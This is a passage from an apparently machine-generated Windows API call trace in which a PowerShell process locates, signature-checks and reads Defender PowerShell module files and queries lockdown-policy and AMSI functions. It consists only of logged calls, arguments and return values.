[1]=0x9c, [2]=0x5b, [3]=0x47, [4]=0x1e, [5]=0xbc, [6]=0xd7, [7]=0xb0))) returned 0x0 [0339.212] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.213] EtwEventActivityIdControl () returned 0x0 [0339.213] EtwEventActivityIdControl () returned 0x0 [0339.213] EtwEventActivityIdControl () returned 0x0 [0339.214] EtwEventActivityIdControl () returned 0x0 [0339.215] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml")) returned 0x20 [0339.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.216] CoTaskMemAlloc (cb=0x20c) returned 0x1b648f90 [0339.216] GetSystemDirectoryW (in: lpBuffer=0x1b648f90, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.216] CoTaskMemFree (pv=0x1b648f90) [0339.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.216] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0339.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0339.217] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.217] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7cc) returned 0x0 [0339.217] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0339.218] RegCloseKey (hKey=0x7cc) returned 0x0 [0339.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0339.218] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x25dfe30 | out: lpFileInformation=0x25dfe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2d43b98f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966)) returned 1 [0339.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0339.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2d43b98f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966)) returned 1 [0339.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0339.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.219] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0339.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2d43b98f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3966)) returned 1 [0339.219] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0339.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0339.220] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.220] GetFileType (hFile=0x7cc) returned 0x1 [0339.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.220] GetFileType (hFile=0x7cc) returned 0x1 [0339.221] WTGetSignatureInfo () returned 0x0 [0339.252] CertDuplicateCertificateContext (pCertContext=0x1b662df0) returned 0x1b662df0 [0339.252] CryptCATHandleFromStore () returned 0x6f9990 [0339.252] WTHelperGetProvSignerFromChain () returned 0x6fd410 [0339.253] WTHelperGetProvCertFromChain () returned 0x6fbff0 [0339.254] CertDuplicateCertificateContext (pCertContext=0x1b662970) returned 0x1b662970 [0339.254] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0339.254] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.254] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x25e06c8, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.254] RegCloseKey (hKey=0x7d4) returned 0x0 [0339.255] CoTaskMemAlloc (cb=0x10) returned 0x1a8a7e50 [0339.255] CoTaskMemAlloc (cb=0x50) returned 0x1a89a560 [0339.255] WinVerifyTrust () returned 0x0 [0339.255] CoTaskMemFree (pv=0x1a89a560) [0339.255] CoTaskMemFree (pv=0x1a8a7e50) [0339.255] CertFreeCertificateContext (pCertContext=0x1b662df0) returned 1 [0339.256] CloseHandle (hObject=0x7cc) returned 1 [0339.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0339.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", nBufferLength=0x59, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml", lpFilePart=0x0) returned 0x58 [0339.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0339.256] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreatDetection.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreatdetection.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.257] GetFileType (hFile=0x7cc) returned 0x1 [0339.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0339.257] GetFileType (hFile=0x7cc) returned 0x1 [0339.257] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0339.257] ReadFile (in: hFile=0x7cc, lpBuffer=0x25e1818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x25e1818*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.258] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0339.258] ReadFile (in: hFile=0x7cc, lpBuffer=0x25e1818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x25e1818*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.259] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0339.259] ReadFile (in: hFile=0x7cc, lpBuffer=0x25e1818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x25e1818*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.259] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0339.259] ReadFile (in: hFile=0x7cc, lpBuffer=0x25e1818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x25e1818*, lpNumberOfBytesRead=0x1b62cd58*=0x966, lpOverlapped=0x0) returned 1 [0339.259] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3966 [0339.259] ReadFile (in: hFile=0x7cc, lpBuffer=0x25e0ce6, nNumberOfBytesToRead=0x29a, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x25e0ce6*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.259] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3966 [0339.260] ReadFile (in: hFile=0x7cc, lpBuffer=0x25e1818, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x25e1818*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.260] CoTaskMemAlloc (cb=0x20c) returned 0x1b64a2b0 [0339.260] GetSystemDirectoryW (in: lpBuffer=0x1b64a2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.260] CoTaskMemFree (pv=0x1b64a2b0) [0339.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.261] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0339.261] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.261] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0339.261] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.262] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7d0) returned 0x0 [0339.263] RegQueryValueExW (in: hKey=0x7d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0339.263] RegCloseKey (hKey=0x7d0) returned 0x0 [0339.263] CloseHandle (hObject=0x7cc) returned 1 [0339.289] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0xa4c83163, Data2=0x40e7, Data3=0x443e, Data4=([0]=0xb6, [1]=0xb6, [2]=0xe8, [3]=0xc, [4]=0xc1, [5]=0x32, [6]=0x13, [7]=0x95))) returned 0x0 [0339.294] AmsiScanBuffer () returned 0x80070015 [0339.301] EtwEventWriteTransfer () returned 0x0 [0339.301] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.302] EtwEventActivityIdControl () returned 0x0 [0339.302] EtwEventActivityIdControl () returned 0x0 [0339.302] EtwEventActivityIdControl () returned 0x0 [0339.303] EtwEventActivityIdControl () returned 0x0 [0339.303] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.304] EtwEventActivityIdControl () returned 0x0 [0339.304] EtwEventActivityIdControl () returned 0x0 [0339.304] EtwEventActivityIdControl () returned 0x0 [0339.304] EtwEventActivityIdControl () returned 0x0 [0339.304] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x58eb2bce, Data2=0x50c6, Data3=0x4005, Data4=([0]=0x9e, [1]=0x4b, [2]=0x52, [3]=0x55, [4]=0xb8, [5]=0xa8, [6]=0x29, [7]=0x6f))) returned 0x0 [0339.304] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x29383958, Data2=0x6695, Data3=0x40af, Data4=([0]=0x81, [1]=0xe3, [2]=0xb0, [3]=0x75, [4]=0x3d, [5]=0xb1, [6]=0xf5, [7]=0x41))) returned 0x0 [0339.304] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.305] EtwEventActivityIdControl () returned 0x0 [0339.305] EtwEventActivityIdControl () returned 0x0 [0339.305] EtwEventActivityIdControl () returned 0x0 [0339.306] EtwEventActivityIdControl () returned 0x0 [0339.306] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml")) returned 0x20 [0339.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.307] CoTaskMemAlloc (cb=0x20c) returned 0x1b648710 [0339.307] GetSystemDirectoryW (in: lpBuffer=0x1b648710, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.308] CoTaskMemFree (pv=0x1b648710) [0339.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0339.308] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0339.309] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.309] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7cc) returned 0x0 [0339.310] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0339.310] RegCloseKey (hKey=0x7cc) returned 0x0 [0339.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0339.310] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2666890 | out: lpFileInformation=0x2666890*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2da5757f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6)) returned 1 [0339.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0339.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", nBufferLength=0x4e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml", lpFilePart=0x0) returned 0x4d [0339.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0339.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2da5757f, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3ce6)) returned 1 [0339.311] SetThreadErrorMode (dwNewMode=0x0, 